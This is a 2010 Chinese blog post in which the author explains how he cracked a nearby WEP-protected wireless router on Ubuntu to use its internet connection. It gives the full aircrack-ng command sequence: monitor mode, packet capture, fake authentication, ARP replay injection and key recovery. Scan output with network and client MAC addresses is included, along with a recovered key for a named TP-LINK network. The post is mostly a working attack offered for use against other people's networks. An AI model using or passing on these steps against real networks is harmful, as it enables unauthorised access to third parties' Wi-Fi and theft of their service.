在Ubuntu 10 下破解无线路由器密码  2010-10-06 12:39:40|  分类： 技术文稿 |  标签： |字号大
中
小 订阅 



            最近买了笔记本， 宏基4741G的， 用着还不错， 家里拉了一条电信的宽带， 女朋友老是晚上看电视，本来就少的可怜的网速被他给一占我就什么都做不成了。 俗话说的好：做什么事都好想一条出路。脑子一转， 就瞄上了屏幕右下角的无线网络了。 
           要说这Ubuntu 不真是不错， 启动关机呀什么的都要比win7要快上不少， 用着也舒心。在此下进行破解也比较好办。 
   
     好了， 第一步：  下载  aircrack  
        最简单的方法就是找开Ubuntu 软件管理中心 ， 在这里直查找 aircrack  ，找到后直接下载安装就可以了，非常方便。

 
  第二步：启动无线网卡的监控模式
     sudo airmon-ng start wlan0 启动无线 网卡 的监控模式。
 第三步：查找你周围的无线网络 
     sudo  airodump-ng  mon0 
        会出现你周围的无线网络列表
----------------------------------------------------------------------------------------------------
 CH  6 ][ Elapsed: 8 s ][ 2010-10-06 12:31                                     
                                                                               
 BSSID                    PWR      Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                               
 00:21:6B:86:C7:08   -1            0               0        0     -1     -1                                  <leng
 00:12:0E:41:2E:24   -1            0              37        6    133   -1   WEP  WEP              <leng
 00:23:CD:82:2B:42  -82          91             91      10     6     54 . WEP  WEP              TP-LI
                                                                               
 BSSID              STATION            PWR   Rate    Lost  Packets  Probes      
                                                                               2
 00:21:6B:86:C7:08  00:23:CD:82:2B:42  -82    0 - 1      0        5  TP-LINK_822
 (not associated)   00:22:43:6C:32:52  -88    0 - 1      0        4  TP-LINK,baw
 (not associated)   78:E4:00:BC:E4:A0    0    0 - 1      0       11  TP-LINK_822
 (not associated)   00:26:82:D8:C0:0B  -86    0 - 1      0        1  dlink      
 00:12:0E:41:2E:24  00:0A:EB:02:C8:3A  -87    0 - 5     84       40             
 00:23:CD:82:2B:42  00:C0:CA:8B:20:E3  -67    1 - 1      7      179         
----------------------------------------------------------------------------------------------------------------
 第四步：开始抓包
    另开一个终端 sudo airodump-ng -c 6 --bssid AP's MAC -w wep mon0 (-c后面的6为AP工作频道，--bissid后面的AP's MAC 是要欲破解AP的MAC地址，-w后的wep的是抓下来的数据包DATA 保存的文件名(可以随便取名)，然后回车开始抓包。
第五步： 建立虚拟连接
    再另开一个终端，输入 sudo aireplay-ng -1 0 -a AP's MAC -h My MAC mon0 与AP建立虚拟连接 (-h后面跟着的My MAC 是自己的无线网卡的MAC地址) 
第六步：发包开扰路由器
    建立虚拟连接成功后，输入sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h My MAC mon0 进行注入，现在步骤3中数据包应该不断增长。
第七步：解密数据包
    集有5000个以上的DATA之后，另开一个终端，输入 sudo aircrack-ng wep*.cap 进行解密 (如果没算出来的话，继续等，Ubuntu aircrack-ng会在DATA每增加多5000个之后就自动再运行 ，直到算出密码为至。
第七步：关闭路由器监听模式
    破解出密码后在终端中输入 sudo airmon-ng stop mon0 关闭监控模式，不然无线网卡会一直向刚刚的AP进行注入的，用ctrl+c退出或者直接关闭终端都是不行的，除非重新启动电脑。


 我试了一个，算出的结果为：
KEY FOUND! [ 13:50:38:29:36 ]   tp-link  822b42 


添上去，果然可以上网了， YES。
